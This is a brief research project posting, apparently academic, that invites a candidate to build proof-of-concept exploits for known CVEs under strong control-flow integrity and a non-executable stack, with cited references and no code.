Control-flow Bending POCs (available)

Starting Date:
Duration:
Time commitment:
Prerequisites:

Research has shifted over the years when it comes to binary exploitation. With more accurate and practical implementations of Control-flow Integrity (CFI) [1] [2] [3], the question arises as to what attack surface is still available – and how to exploit it. In particular, what attacks can be performed when staying within the boundaries of a (perfect) CFI, or even without changing any control data (saved instruction pointers, function pointers, etc.). It would be very useful to have more examples of these attacks in practice.

This project aims to craft an exploit for a number of known CVEs. This will be done in a research setup, to solely focus on the restrictions posed by a strong CFI policy and a non-executable stack. For this project we are looking for a skilled candidate with experience in C/C++, assembly (x86/x86-64), ELF executables and exploitation of these (e.g. prior experience in exploitation CTF challenges).

[1] https://nebelwelt.net/blog/20160913-ControlFlowIntegrity.html
[2] https://www.microsoft.com/en-us/research/wp-content/uploads/2005/11/ccs05.pdf
[3] https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-carlini.pdf